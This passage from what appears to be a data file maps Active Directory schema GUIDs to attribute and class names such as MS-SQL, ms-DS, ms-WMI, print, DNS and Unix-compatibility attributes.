\"PKT\",\n \"bf967a79-0de6-11d0-a285-00aa003049e2\": \"Winsock-Addresses\",\n \"b23fc141-0df5-4aea-b33d-6cf493077b3f\": \"ms-DS-Assigned-AuthN-Policy-Silo\",\n \"595b2613-4109-4e77-9013-a3bb4ef277c7\": \"ms-WMI-PolicyType\",\n \"96bc3a1a-e3d2-49d3-af11-7b0df79d67f5\": \"ms-DS-Device-Registration-Service\",\n \"fe6136a0-2073-11d0-a9c2-00aa006c33ed\": \"Division\",\n \"db5b0728-6208-4876-83b7-95d3e5695275\": \"ms-DS-Az-Application-Name\",\n \"8157fa38-ccee-11d2-9993-0000f87a57d4\": \"MS-SQL-MultiProtocol\",\n \"8447f9f0-1027-11d0-a05f-00aa006c33ed\": \"PKT-Guid\",\n \"bf967a7a-0de6-11d0-a285-00aa003049e2\": \"WWW-Home-Page\",\n \"33140514-f57a-47d2-8ec4-04c4666600c7\": \"ms-DS-Assigned-AuthN-Policy-Silo-BL\",\n \"f0f8ff8b-1191-11d0-a060-00aa006c33ed\": \"DMD-Location\",\n \"7184a120-3ac4-47ae-848f-fe0ab20784d4\": \"ms-DS-Az-Application-Version\",\n \"86b08004-ccee-11d2-9993-0000f87a57d4\": \"MS-SQL-SPX\",\n \"19405b96-3cfa-11d1-a9c0-0000f80367c1\": \"Policy-Replication-Flags\",\n \"9a9a0221-4a5b-11d1-a9c3-0000f80367c1\": \"WWW-Page-Other\",\n \"164d1e05-48a6-4886-a8e9-77a2006e3c77\": \"ms-DS-AuthN-Policy-Silo-Members\",\n \"45fb5a57-5018-4d0f-9056-997c8c9122d9\": \"ms-WMI-RangeParam\",\n \"7c9e8c58-901b-4ea8-b6ec-4eb9e9fc0e11\": \"ms-DS-Device-Container\",\n \"167757b9-47f3-11d1-a9c3-0000f80367c1\": \"DMD-Name\",\n \"33d41ea8-c0c9-4c92-9494-f104878413fd\": \"ms-DS-Az-Biz-Rule\",\n \"8ac263a6-ccee-11d2-9993-0000f87a57d4\": \"MS-SQL-TCPIP\",\n \"281416c4-1968-11d0-a28f-00aa003049e2\": \"Port-Name\",\n \"bf967a7b-0de6-11d0-a285-00aa003049e2\": \"X121-Address\",\n \"11fccbc7-fbe4-4951-b4b7-addf6f9efd44\": \"ms-DS-AuthN-Policy-Silo-Members-BL\",\n \"2df90d86-009f-11d2-aa4c-00c04fd7d83a\": \"DN-Reference-Update\",\n \"52994b56-0e6c-4e07-aa5c-ef9d7f5a0e25\": \"ms-DS-Az-Biz-Rule-Language\",\n \"8fda89f4-ccee-11d2-9993-0000f87a57d4\": \"MS-SQL-AppleTalk\",\n \"bf9679fa-0de6-11d0-a285-00aa003049e2\": \"Poss-Superiors\",\n \"d07da11f-8a3d-42b6-b0aa-76c962be719a\": \"x500uniqueIdentifier\",\n \"cd26b9f3-d415-442a-8f78-7c61523ee95b\": \"ms-DS-User-AuthN-Policy\",\n \"6afe8fe2-70bc-4cce-b166-a96f7359c514\": \"ms-WMI-RealRangeParam\",\n \"d2b1470a-8f84-491e-a752-b401ee00fe5c\": \"ms-DS-AuthN-Policy-Silos\",\n \"e0fa1e65-9b45-11d0-afdd-00c04fd930c9\": \"Dns-Allow-Dynamic\",\n \"013a7277-5c2d-49ef-a7de-b765b36a3f6f\": \"ms-DS-Az-Class-ID\",\n \"94c56394-ccee-11d2-9993-0000f87a57d4\": \"MS-SQL-Vines\",\n \"9a7ad94c-ca53-11d1-bbd0-0080c76670c0\": \"Possible-Inferiors\",\n \"bf967a7f-0de6-11d0-a285-00aa003049e2\": \"X509-Cert\",\n \"2f17faa9-5d47-4b1f-977e-aa52fabe65c8\": \"ms-DS-User-AuthN-Policy-BL\",\n \"e0fa1e66-9b45-11d0-afdd-00c04fd930c9\": \"Dns-Allow-XFR\",\n \"6448f56a-ca70-4e2e-b0af-d20e4ce653d0\": \"ms-DS-Az-Domain-Timeout\",\n \"9a7d4770-ccee-11d2-9993-0000f87a57d4\": \"MS-SQL-Status\",\n \"bf9679fb-0de6-11d0-a285-00aa003049e2\": \"Post-Office-Box\",\n \"612cb747-c0e8-4f92-9221-fdd5f15b550d\": \"UnixUserPassword\",\n \"afb863c9-bea3-440f-a9f3-6153cc668929\": \"ms-DS-Computer-AuthN-Policy\",\n \"3c7e6f83-dd0e-481b-a0c2-74cd96ef2a66\": \"ms-WMI-Rule\",\n \"3a9adf5d-7b97-4f7e-abb4-e5b55c1c06b4\": \"ms-DS-AuthN-Policies\",\n \"72e39547-7b18-11d1-adef-00c04fd8d5cd\": \"DNS-Host-Name\",\n \"f90abab0-186c-4418-bb85-88447c87222a\": \"ms-DS-Az-Generate-Audits\",\n \"9fcc43d4-ccee-11d2-9993-0000f87a57d4\": \"MS-SQL-LastUpdatedDate\",\n \"bf9679fc-0de6-11d0-a285-00aa003049e2\": \"Postal-Address\",\n \"850fcc8f-9c6b-47e1-b671-7c654be4d5b3\": \"UidNumber\",\n \"2bef6232-30a1-457e-8604-7af6dbf131b8\": \"ms-DS-Computer-AuthN-Policy-BL\",\n \"e0fa1e68-9b45-11d0-afdd-00c04fd930c9\": \"Dns-Notify-Secondaries\",\n \"665acb5c-bb92-4dbc-8c59-b3638eab09b3\": \"ms-DS-Az-Last-Imported-Biz-Rule-Path\",\n \"a42cd510-ccee-11d2-9993-0000f87a57d4\": \"MS-SQL-InformationURL\",\n \"bf9679fd-0de6-11d0-a285-00aa003049e2\": \"Postal-Code\",\n \"c5b95f0c-ec9e-41c4-849c-b46597ed6696\": \"GidNumber\",\n \"2a6a6d95-28ce-49ee-bb24-6d1fc01e3111\": \"ms-DS-Service-AuthN-Policy\",\n \"f1e44bdf-8dd3-4235-9c86-f91f31f5b569\": \"ms-WMI-ShadowObject\",\n \"f9f0461e-697d-4689-9299-37e61d617b0d\": \"ms-DS-AuthN-Policy-Silo\",\n \"675a15fe-3b70-11d2-90cc-00c04fd91ab1\": \"DNS-Property\",\n \"5e53368b-fc94-45c8-9d7d-daf31ee7112d\": \"ms-DS-Az-LDAP-Query\",\n \"a92d23da-ccee-11d2-9993-0000f87a57d4\": \"MS-SQL-ConnectionURL\",\n \"bf9679fe-0de6-11d0-a285-00aa003049e2\": \"Preferred-Delivery-Method\",\n \"a3e03f1f-1d55-4253-a0af-30c2a784e46e\": \"Gecos\",\n \"2c1128ec-5aa2-42a3-b32d-f0979ca9fcd2\": \"ms-DS-Service-AuthN-Policy-BL\",\n \"f60a8f96-57c4-422c-a3ad-9e2fa09ce6f7\": \"ms-DS-Device-MDMStatus\",\n \"e0fa1e69-9b45-11d0-afdd-00c04fd930c9\": \"Dns-Record\",\n \"cfb9adb7-c4b7-4059-9568-1ed9db6b7248\": \"ms-DS-Az-Major-Version\",\n \"ae0c11b8-ccee-11d2-9993-0000f87a57d4\": \"MS-SQL-PublicationURL\",\n \"856be0d0-18e7-46e1-8f5f-7ee4d9020e0d\": \"preferredLanguage\",\n \"bc2dba12-000f-464d-bf1d-0808465d8843\": \"UnixHomeDirectory\",\n \"b87a0ad8-54f7-49c1-84a0-e64d12853588\": \"ms-DS-Assigned-AuthN-Policy\",\n \"6cc8b2b5-12df-44f6-8307-e74f5cdee369\": \"ms-WMI-SimplePolicyTemplate\",\n \"a11703b7-5641-4d9c-863e-5fb3325e74e0\": \"ms-DS-GeoCoordinates-Altitude\",\n \"bf967959-0de6-11d0-a285-00aa003049e2\": \"Dns-Root\",\n \"ee85ed93-b209-4788-8165-e702f51bfbf3\": \"ms-DS-Az-Minor-Version\",\n \"b222ba0e-ccee-11d2-9993-0000f87a57d4\": \"MS-SQL-GPSLatitude\",\n \"bf9679ff-0de6-11d0-a285-00aa003049e2\": \"Preferred-OU\",\n \"a553d12c-3231-4c5e-8adf-8d189697721e\": \"LoginShell\",\n \"2d131b3c-d39f-4aee-815e-8db4bc1ce7ac\": \"ms-DS-Assigned-AuthN-Policy-BL\",\n \"dc66d44e-3d43-40f5-85c5-3c12e169927e\": \"ms-DS-GeoCoordinates-Latitude\",\n \"e0fa1e67-9b45-11d0-afdd-00c04fd930c9\": \"Dns-Secure-Secondaries\",\n \"a5f3b553-5d76-4cbe-ba3f-4312152cab18\": \"ms-DS-Az-Operation-ID\",\n \"b7577c94-ccee-11d2-9993-0000f87a57d4\": \"MS-SQL-GPSLongitude\",\n \"52458022-ca6a-11d0-afff-0000f80367c1\": \"Prefix-Map\",\n \"f8f2689c-29e8-4843-8177-e8b98e15eeac\": \"ShadowLastChange\",\n \"7a560cc2-ec45-44ba-b2d7-21236ad59fd5\": \"ms-DS-AuthN-Policy-Enforced\",\n \"ab857078-0142-4406-945b-34c9b6b13372\": \"ms-WMI-Som\",\n \"94c42110-bae4-4cea-8577-af813af5da25\": \"ms-DS-GeoCoordinates-Longitude\",\n \"d5eb2eb7-be4e-463b-a214-634a44d7392e\": \"DNS-Tombstoned\",\n \"515a6b06-2617-4173-8099-d5605df043c6\": \"ms-DS-Az-Scope-Name\",\n \"bcdd4f0e-ccee-11d2-9993-0000f87a57d4\": \"MS-SQL-GPSHeight\",\n \"a8df744b-c5ea-11d1-bbcb-0080c76670c0\": \"Presentation-Address\",\n \"a76b8737-e5a1-4568-b057-dc12e04be4b2\": \"ShadowMin\",\n \"f2f51102-6be0-493d-8726-1546cdbc8771\": \"ms-DS-AuthN-Policy-Silo-Enforced\",\n \"bd29bf90-66ad-40e1-887b-10df070419a6\": \"ms-DS-External-Directory-Object-Id\",\n \"f18a8e19-af5f-4478-b096-6f35c27eb83f\": \"documentAuthor\",\n \"2629f66a-1f95-4bf3-a296-8e9d7b9e30c8\": \"ms-DS-Az-Script-Engine-Cache-Max\",\n \"c07cc1d0-ccee-11d2-9993-0000f87a57d4\": \"MS-SQL-Version\",\n \"963d2739-48be-11d1-a9c3-0000f80367c1\": \"Previous-CA-Certificates\",\n \"f285c952-50dd-449e-9160-3b880d99988d\": \"ShadowMax\",\n \"0bc579a2-1da7-4cea-b699-807f3b9d63a4\": \"ms-WMI-StringSetParam\",\n \"0b21ce82-ff63-46d9-90fb-c8b9f24e97b9\": \"documentIdentifier\",\n \"87d0fb41-2c8b-41f6-b972-11fdfd50d6b0\": \"ms-DS-Az-Script-Timeout\",\n \"c57f72f4-ccee-11d2-9993-0000f87a57d4\": \"MS-SQL-Language\",\n \"963d273d-48be-11d1-a9c3-0000f80367c1\": \"Previous-Parent-CA\",\n \"7ae89c9c-2976-4a46-bb8a-340f88560117\": \"ShadowWarning\",\n \"2628a46a-a6ad-4ae0-b854-2b12d9fe6f9e\": \"account\",\n \"bf967aa1-0de6-11d0-a285-00aa003049e2\": \"Mail-Recipient\",\n \"b958b14e-ac6d-4ec4-8892-be70b69f7281\": \"documentLocation\",\n \"7b078544-6c82-4fe9-872f-ff48ad2b2e26\": \"ms-DS-Az-Task-Is-Role-Definition\",\n \"8386603c-ccef-11d2-9993-0000f87a57d4\": \"MS-SQL-Description\",\n \"bf967a00-0de6-11d0-a285-00aa003049e2\": \"Primary-Group-ID\",\n \"86871d1f-3310-4312-8efd-af49dcfb2671\": \"ShadowInactive\",\n \"bf967a83-0de6-11d0-a285-00aa003049e2\": \"Class-Schema\",\n \"d9a799b2-cef3-48b3-b5ad-fb85f8dd3214\": \"ms-WMI-UintRangeParam\",\n \"59527d0f-b7c0-4ce2-a1dd-71cef6963292\": \"ms-DS-Is-Compliant\",\n \"170f09d7-eb69-448a-9a30-f1afecfd32d7\": \"documentPublisher\",\n \"8491e548-6c38-4365-a732-af041569b02c\": \"ms-DS-Az-Object-Guid\",\n \"ca48eba8-ccee-11d2-9993-0000f87a57d4\": \"MS-SQL-Type\",\n \"c0ed8738-7efd-4481-84d9-66d2db8be369\": \"Primary-Group-Token\",\n \"75159a00-1fff-4cf4-8bff-4ef2695cf643\": \"ShadowExpire\",\n \"d1328fbc-8574-4150-881d-0b1088827878\": \"ms-DS-Key-Principal-BL\",\n \"de265a9c-ff2c-47b9-91dc-6e6fe2c43062\": \"documentTitle\",\n \"b5f7e349-7a5b-407c-a334-a31c3f538b98\": \"ms-DS-Az-Generic-Data\",\n \"d0aedb2e-ccee-11d2-9993-0000f87a57d4\": \"MS-SQL-InformationDirectory\",\n \"281416d7-1968-11d0-a28f-00aa003049e2\": \"Print-Attributes\",\n \"8dfeb70d-c5db-46b6-b15e-a4389e6cee9b\": \"ShadowFlag\",\n \"7f561288-5301-11d1-a9c5-0000f80367c1\": \"ACS-Policy\",\n \"8f4beb31-4e19-46f5-932e-5fa03c339b1d\": \"ms-WMI-UintSetParam\",\n \"c4a46807-6adc-4bbb-97de-6bed181a1bfe\": \"ms-DS-Device-Trust-Type\",\n \"94b3a8a9-d613-4cec-9aad-5fbcc1046b43\": \"documentVersion\",\n \"d31a8757-2447-4545-8081-3bb610cacbf2\": \"ms-DS-Behavior-Version\",\n \"d5a0dbdc-ccee-11d2-9993-0000f87a57d4\": \"MS-SQL-Database\",\n \"281416cd-1968-11d0-a28f-00aa003049e2\": \"Print-Bin-Names\",\n \"03dab236-672e-4f61-ab64-f77d2dc2ffab\": \"MemberUid\",\n \"1dcc0722-aab0-4fef-956f-276fe19de107\": \"ms-DS-Shadow-Principal-Sid\",\n \"7bfdcb7a-4807-11d1-a9c3-0000f80367c1\": \"Domain-Certificate-Authorities\",\n \"f0d8972e-dd5b-40e5-a51d-044c7c17ece7\": \"ms-DS-Byte-Array\",\n \"db77be4a-ccee-11d2-9993-0000f87a57d4\": \"MS-SQL-AllowAnonymousSubscription\",\n \"281416d2-1968-11d0-a28f-00aa003049e2\": \"Print-Collate\",\n \"0f6a17dc-53e5-4be8-9442-8f3ce2f9012a\": \"MemberNisNetgroup\",\n \"2e899b04-2834-11d3-91d4-0000f87a57d4\": \"ACS-Resource-Limits\",\n \"b82ac26b-c6db-4098-92c6-49c18a3336e1\": \"ms-WMI-UnknownRangeParam\",\n \"19195a55-6da0-11d0-afd3-00c04fd930c9\": \"Domain-Component\",\n \"69cab008-cdd4-4bc9-bab8-0ff37efe1b20\": \"ms-DS-Cached-Membership\",\n \"e0c6baae-ccee-11d2-9993-0000f87a57d4\": \"MS-SQL-Alias\",\n \"281416d3-1968-11d0-a28f-00aa003049e2\": \"Print-Color\",\n \"a8032e74-30ef-4ff5-affc-0fc217783fec\": \"NisNetgroupTriple\",\n \"11f95545-d712-4c50-b847-d2781537c633\": \"ms-DS-Shadow-Principal-Container\",\n \"b000ea7b-a086-11d0-afdd-00c04fd930c9\": \"Domain-Cross-Ref\",\n \"3566bf1f-beee-4dcb-8abe-ef89fcfec6c1\": \"ms-DS-Cached-Membership-Time-Stamp\",\n \"e9098084-ccee-11d2-9993-0000f87a57d4\": \"MS-SQL-Size\",\n \"281416cc-1968-11d0-a28f-00aa003049e2\": \"Print-Duplex-Supported\",\n \"ff2daebf-f463-495a-8405-3e483641eaa2\": \"IpServicePort\",\n \"7f561289-5301-11d1-a9c5-0000f80367c1\": \"ACS-Subnet\",\n \"05630000-3927-4ede-bf27-ca91f275c26f\": \"ms-WMI-WMIGPO\",\n \"963d2734-48be-11d1-a9c3-0000f80367c1\": \"Domain-ID\",\n \"23773dc2-b63a-11d2-90e1-00c04fd91ab1\": \"MS-DS-Consistency-Guid\",\n \"ede14754-ccee-11d2-9993-0000f87a57d4\": \"MS-SQL-CreationDate\",\n \"281416ca-1968-11d0-a28f-00aa003049e2\": \"Print-End-Time\",\n \"cd96ec0b-1ed6-43b4-b26b-f170b645883f\": \"IpServiceProtocol\",\n \"770f4cb3-1643-469c-b766-edd77aa75e14\": \"ms-DS-Shadow-Principal\",\n \"7f561278-5301-11d1-a9c5-0000f80367c1\": \"Domain-Identifier\",\n \"178b7bc2-b63a-11d2-90e1-00c04fd91ab1\": \"MS-DS-Consistency-Child-Count\",\n \"f2b6abca-ccee-11d2-9993-0000f87a57d4\": \"MS-SQL-LastBackupDate\",\n \"281416cb-1968-11d0-a28f-00aa003049e2\": \"Print-Form-Name\",\n \"ebf5c6eb-0e2d-4415-9670-1081993b4211\": \"IpProtocolNumber\",\n \"3e74f60f-3e73-11d1-a9c0-0000f80367c1\": \"Address-Book-Container\",\n \"9a0dc344-c100-11d1-bbc5-0080c76670c0\": \"MSMQ-Configuration\",\n \"c294f84b-2fad-4b71-be4c-9fc5701f60ba\": \"ms-DS-Key-Id\",\n \"bf96795d-0de6-11d0-a285-00aa003049e2\": \"Domain-Policy-Object\",\n \"c5e60132-1480-11d3-91c1-0000f87a57d4\": \"MS-DS-Creator-SID\",\n \"f6d6dd88-ccee-11d2-9993-0000f87a57d4\": \"MS-SQL-LastDiagnosticDate\",\n \"ba305f6d-47e3-11d0-a1a6-00c04fd930c9\": \"Print-Keep-Printed-Jobs\",\n \"966825f5-01d9-4a5c-a011-d15ae84efa55\": \"OncRpcNumber\",\n \"a12e0e9f-dedb-4f31-8f21-1311b958182f\": \"ms-DS-Key-Material\",\n \"80a67e2a-9f22-11d0-afdd-00c04fd930c9\": \"Domain-Policy-Reference\",\n \"234fcbd8-fb52-4908-a328-fd9f6e58e403\": \"ms-DS-Date-Time\",\n \"fbcda2ea-ccee-11d2-9993-0000f87a57d4\": \"MS-SQL-Applications\",\n \"281416d6-1968-11d0-a28f-00aa003049e2\": \"Print-Language\",\n \"de8bb721-85dc-4fde-b687-9657688e667e\": \"IpHostNumber\",\n \"5fd4250a-1262-11d0-a060-00aa006c33ed\": \"Address-Template\",\n \"876d6817-35cc-436c-acea-5ef7174dd9be\": \"MSMQ-Custom-Recipient\",\n \"de71b44c-29ba-4597-9eca-c3348ace1917\": \"ms-DS-Key-Usage\",\n \"bf96795e-0de6-11d0-a285-00aa003049e2\": \"Domain-Replica\",\n \"6818f726-674b-441b-8a3a-f40596374cea\": \"ms-DS-Default-Quota\",\n \"01e9a98a-ccef-11d2-9993-0000f87a57d4\": \"MS-SQL-Keywords\",\n \"ba305f7a-47e3-11d0-a1a6-00c04fd930c9\": \"Print-MAC-Address\",\n \"4e3854f4-3087-42a4-a813-bb0c528958d3\": \"IpNetworkNumber\",\n \"bd61253b-9401-4139-a693-356fc400f3ea\": \"ms-DS-Key-Principal\",\n \"80a67e29-9f22-11d0-afdd-00c04fd930c9\": \"Domain-Wide-Policy\",\n \"a9b38cb6-189a-4def-8a70-0fcfa158148e\": \"ms-DS-Deleted-Object-Lifetime\",\n \"c1676858-d34b-11d2-999a-0000f87a57d4\": \"MS-SQL-Publisher\",\n \"281416d1-1968-11d0-a28f-00aa003049e2\": \"Print-Max-Copies\",\n \"6ff64fcd-462e-4f62-b44a-9a5347659eb9\": \"IpNetmaskNumber\",\n \"3fdfee4f-47f4-11d1-a9c3-0000f80367c1\": \"Application-Entity\",\n \"9a0dc345-c100-11d1-bbc5-0080c76670c0\": \"MSMQ-Enterprise-Settings\",\n \"642c1129-3899-4721-8e21-4839e3988ce5\": \"ms-DS-Device-DN\",\n \"1a1aa5b5-262e-4df6-af04-2cf6b0d80048\": \"drink\",\n \"2143acca-eead-4d29-b591-85fa49ce9173\": \"ms-DS-DnsRootAlias\",\n \"c3bb7054-d34b-11d2-999a-0000f87a57d4\": \"MS-SQL-AllowKnownPullSubscription\",\n \"281416cf-1968-11d0-a28f-00aa003049e2\": \"Print-Max-Resolution-Supported\",\n \"e6a522dd-9770-43e1-89de-1de5044328f7\": \"MacAddress\",\n \"dffbd720-0872-402e-9940-fcd78db049ba\": \"ms-DS-Computer-SID\",\n \"281416c5-1968-11d0-a28f-00aa003049e2\": \"Driver-Name\",\n \"5706aeaf-b940-4fb2-bcfc-5268683ad9fe\": \"ms-DS-Enabled-Feature\",\n \"c4186b6e-d34b-11d2-999a-0000f87a57d4\": \"MS-SQL-AllowImmediateUpdatingSubscription\",\n \"ba305f6f-47e3-11d0-a1a6-00c04fd930c9\": \"Print-Max-X-Extent\",\n \"d72a0750-8c7c-416e-8714-e65f11e908be\": \"BootParameter\",\n \"5fd4250b-1262-11d0-a060-00aa006c33ed\": \"Application-Process\",\n \"46b27aac-aafa-4ffb-b773-e5bf621ee87b\": \"MSMQ-Group\",\n \"b6e5e988-e5e4-4c86-a2ae-0dacb970a0e1\": \"ms-DS-Custom-Key-Information\",\n \"ba305f6e-47e3-11d0-a1a6-00c04fd930c9\": \"Driver-Version\",\n \"ce5b01bc-17c6-44b8-9dc1-a9668b00901b\": \"ms-DS-Enabled-Feature-BL\",\n \"c458ca80-d34b-11d2-999a-0000f87a57d4\": \"MS-SQL-AllowQueuedUpdatingSubscription\",\n \"ba305f70-47e3-11d0-a1a6-00c04fd930c9\": \"Print-Max-Y-Extent\",\n \"e3f3cb4e-0f20-42eb-9703-d2ff26e52667\": \"BootFile\",\n \"649ac98d-9b9a-4d41-af6b-f616f2a62e4a\": \"ms-DS-Key-Approximate-Last-Logon-Time-Stamp\",\n \"d167aa4b-8b08-11d2-9939-0000f87a57d4\": \"DS-Core-Propagation-Data\",\n \"e1e9bad7-c6dd-4101-a843-794cec85b038\": \"ms-DS-Entry-Time-To-Die\",\n \"c49b8be8-d34b-11d2-999a-0000f87a57d4\": \"MS-SQL-AllowSnapshotFilesFTPDownloading\",\n \"3bcbfcf5-4d3d-11d0-a1a6-00c04fd930c9\": \"Print-Media-Ready\",\n \"969d3c79-0e9a-4d95-b0ac-bdde7ff8f3a1\": \"NisMapName\",\n \"f780acc1-56f0-11d1-a9c6-0000f80367c1\": \"Application-Settings\",\n \"50776997-3c3d-11d2-90cc-00c04fd91ab1\": \"MSMQ-Migrated-User\",\n \"f0f8ff86-1191-11d0-a060-00aa006c33ed\": \"DS-Heuristics\",\n \"9d054a5a-d187-46c1-9d85-42dfc44a56dd\": \"ms-DS-ExecuteScriptPassword\",\n \"c4e311fc-d34b-11d2-999a-0000f87a57d4\": \"MS-SQL-ThirdParty\",\n \"244b296f-5abd-11d0-afd2-00c04fd930c9\": \"Print-Media-Supported\",\n \"4a95216e-fcc0-402e-b57f-5971626148a9\": \"NisMapEntry\",\n \"ee1f5543-7c2e-476a-8b3f-e11f4af6c498\": \"ms-DS-Key-Credential\",\n \"ee8d0ae0-6f91-11d2-9905-0000f87a57d4\": \"DS-UI-Admin-Maximum\",\n \"b92fd528-38ac-40d4-818d-0433380837c1\": \"ms-DS-External-Key\",\n \"4cc4601e-7201-4141-abc8-3e529ae88863\": \"ms-TAPI-Conference-Blob\",\n \"ba305f74-47e3-11d0-a1a6-00c04fd930c9\": \"Print-Memory\",\n \"27eebfa2-fbeb-4f8e-aad6-c50247994291\": \"msSFU-30-Search-Container\",\n \"19195a5c-6da0-11d0-afd3-00c04fd930c9\": \"Application-Site-Settings\",\n \"9a0dc343-c100-11d1-bbc5-0080c76670c0\": \"MSMQ-Queue\",\n \"938ad788-225f-4eee-93b9-ad24a159e1db\": \"ms-DS-Key-Credential-Link-BL\",\n \"f6ea0a94-6f91-11d2-9905-0000f87a57d4\": \"DS-UI-Admin-Notification\",\n \"604877cd-9cdb-47c7-b03d-3daadb044910\": \"ms-DS-External-Store\",\n \"efd7d7f7-178e-4767-87fa-f8a16b840544\": \"ms-TAPI-Ip-Address\",\n \"ba305f71-47e3-11d0-a1a6-00c04fd930c9\": \"Print-Min-X-Extent\",\n \"32ecd698-ce9e-4894-a134-7ad76b082e83\": \"msSFU-30-Key-Attributes\",\n \"bf967aba-0de6-11d0-a285-00aa003049e2\": \"User\",\n \"fcca766a-6f91-11d2-9905-0000f87a57d4\": \"DS-UI-Shell-Maximum\",\n \"9b88bda8-dd82-4998-a91d-5f2d2baf1927\": \"ms-DS-Optional-Feature-GUID\",\n \"89c1ebcf-7a5f-41fd-99ca-c900b32299ab\": \"ms-TAPI-Protocol-Id\",\n \"ba305f72-47e3-11d0-a1a6-00c04fd930c9\": \"Print-Min-Y-Extent\",\n \"a2e11a42-e781-4ca1-a7fa-ec307f62b6a1\": \"msSFU-30-Field-Separator\",\n \"ddc790ac-af4d-442a-8f0f-a1d4caa7dd92\": \"Application-Version\",\n \"9a0dc347-c100-11d1-bbc5-0080c76670c0\": \"MSMQ-Settings\",\n \"167757bc-47f3-11d1-a9c3-0000f80367c1\": \"DSA-Signature\",\n \"fb00dcdf-ac37-483a-9c12-ac53a6603033\": \"ms-DS-Filter-Containers\",\n \"70a4e7ea-b3b9-4643-8918-e6dd2471bfd4\": \"ms-TAPI-Unique-Identifier\",\n \"ba305f79-47e3-11d0-a1a6-00c04fd930c9\": \"Print-Network-Address\",\n \"95b2aef0-27e4-4cb9-880a-a2d9a9ea23b8\": \"msSFU-30-Intra-Field-Separator\",\n \"5df2b673-6d41-4774-b3e8-d52e8ee9ff99\": \"ms-DS-Device\",\n \"52458021-ca6a-11d0-afff-0000f80367c1\": \"Dynamic-LDAP-Server\",\n \"11e9a5bc-4517-4049-af9c-51554fb0fc09\": \"ms-DS-Has-Instantiated-NCs\",\n \"6366c0c1-6972-4e66-b3a5-1d52ad0c0547\": \"ms-WMI-Author\",\n \"ba305f6a-47e3-11d0-a1a6-00c04fd930c9\": \"Print-Notify\",\n \"ef9a2df0-2e57-48c8-8950-0cc674004733\": \"msSFU-30-Search-Attributes\",\n \"9a0dc346-c100-11d1-bbc5-0080c76670c0\": \"MSMQ-Site-Link\",\n \"5b47d60f-6090-40b2-9f37-2a4de88f3063\": \"ms-DS-Key-Credential-Link\",\n \"bf967961-0de6-11d0-a285-00aa003049e2\": \"E-mail-Addresses\",\n \"6f17e347-a842-4498-b8b3-15e007da4fed\": \"ms-DS-Has-Domain-NCs\",\n \"f9cdf7a0-ec44-4937-a79b-cd91522b3aa8\": \"ms-WMI-ChangeDate\",\n \"3bcbfcf4-4d3d-11d0-a1a6-00c04fd930c9\": \"Print-Number-Up\",\n \"e167b0b6-4045-4433-ac35-53f972d45cba\": \"msSFU-30-Result-Attributes\",\n \"bf967a81-0de6-11d0-a285-00aa003049e2\": \"Builtin-Domain\",\n \"8e4eb2ec-4712-11d0-a1a0-00c04fd930c9\": \"EFSPolicy\",\n \"ae2de0e2-59d7-4d47-8d47-ed4dfe4357ad\": \"ms-DS-Has-Master-NCs\",\n \"90c1925f-4a24-4b07-b202-be32eb3c8b74\": \"ms-WMI-Class\",\n \"281416d0-1968-11d0-a28f-00aa003049e2\": \"Print-Orientations-Supported\",\n \"b7b16e01-024f-4e23-ad0d-71f1a406b684\": \"msSFU-30-Map-Filter\",\n \"19195a60-6da0-11d0-afd3-00c04fd930c9\": \"NTDS-Connection\",\n \"f2699093-f25a-4220-9deb-03df4cc4a9c5\": \"Dns-Zone-Scope-Container\",\n \"bf967962-0de6-11d0-a285-00aa003049e2\": \"Employee-ID\",\n \"80641043-15a2-40e1-92a2-8ca866f70776\": \"ms-DS-Host-Service-Account\",\n \"2b9c0ebc-c272-45cb-99d2-4d0e691632e0\": \"ms-WMI-ClassDefinition\",\n \"ba305f69-47e3-11d0-a1a6-00c04fd930c9\": \"Print-Owner\",\n \"4cc908a2-9e18-410e-8459-f17cc422020a\": \"msSFU-30-Master-Server-Name\",\n \"7d6c0e9d-7e20-11d0-afd6-00c04fd930c9\": \"Category-Registration\",\n \"a8df73ef-c5ea-11d1-bbcb-0080c76670c0\": \"Employee-Number\",\n \"79abe4eb-88f3-48e7-89d6-f4bc7e98c331\": \"ms-DS-Host-Service-Account-BL\",\n \"748b0a2e-3351-4b3f-b171-2f17414ea779\": \"ms-WMI-CreationDate\",\n \"19405b97-3cfa-11d1-a9c0-0000f80367c1\": \"Print-Pages-Per-Minute\",\n \"02625f05-d1ee-4f9f-b366-55266becb95c\": \"msSFU-30-Order-Number\",\n \"f0f8ffab-1191-11d0-a060-00aa006c33ed\": \"NTDS-DSA\",\n \"696f8a61-2d3f-40ce-a4b3-e275dfcc49c5\": \"Dns-Zone-Scope\",\n \"a8df73f0-c5ea-11d1-bbcb-0080c76670c0\": \"Employee-Type\",\n \"7bc64cea-c04e-4318-b102-3e0729371a65\": \"ms-DS-Integer\",\n \"50c8673a-8f56-4614-9308-9e1340fb9af3\": \"ms-WMI-Genus\",\n \"ba305f77-47e3-11d0-a1a6-00c04fd930c9\": \"Print-Rate\",\n \"16c5d1d3-35c2-4061-a870-a5cefda804f0\": \"msSFU-30-Name\",\n \"3fdfee50-47f4-11d1-a9c3-0000f80367c1\": \"Certification-Authority\",\n \"a8df73f2-c5ea-11d1-bbcb-0080c76670c0\": \"Enabled\",\n \"bc60096a-1b47-4b30-8877-602c93f56532\": \"ms-DS-IntId\",\n \"9339a803-94b8-47f7-9123-a853b9ff7e45\": \"ms-WMI-ID\",\n \"ba305f78-47e3-11d0-a1a6-00c04fd930c9\": \"Print-Rate-Unit\",\n \"20ebf171-c69a-4c31-b29d-dcb837d8912d\": \"msSFU-30-Aliases\",\n \"85d16ec1-0791-4bc8-8ab3-70980602ff8c\": \"NTDS-DSA-RO\",\n \"e0fa1e8c-9b45-11d0-afdd-00c04fd930c9\": \"Dns-Node\",\n \"bf967963-0de6-11d0-a285-00aa003049e2\": \"Enabled-Connection\",\n \"6fabdcda-8c53-204f-b1a4-9df0c67c1eb4\": \"ms-DS-Is-Possible-Values-Present\",\n \"1b0c07f8-76dd-4060-a1e1-70084619dc90\": \"ms-WMI-intDefault\",\n \"281416c6-1968-11d0-a28f-00aa003049e2\": \"Print-Separator-File\",\n \"37830235-e5e9-46f2-922b-d8d44f03e7ae\": \"msSFU-30-Key-Values\",\n \"bf967a82-0de6-11d0-a285-00aa003049e2\": \"Class-Registration\",\n \"3417ab48-df24-4fb1-80b0-0fcb367e25e3\": \"ms-DS-Expire-Passwords-On-Smart-Card-Only-Accounts\",\n \"2a39c5b3-8960-11d1-aebc-0000f80367c1\": \"Enrollment-Providers\",\n \"1df5cf33-0fe5-499e-90e1-e94b42718a46\": \"ms-DS-isGC\",\n \"18e006b9-6445-48e3-9dcf-b5ecfbc4df8e\": \"ms-WMI-intFlags1\",\n 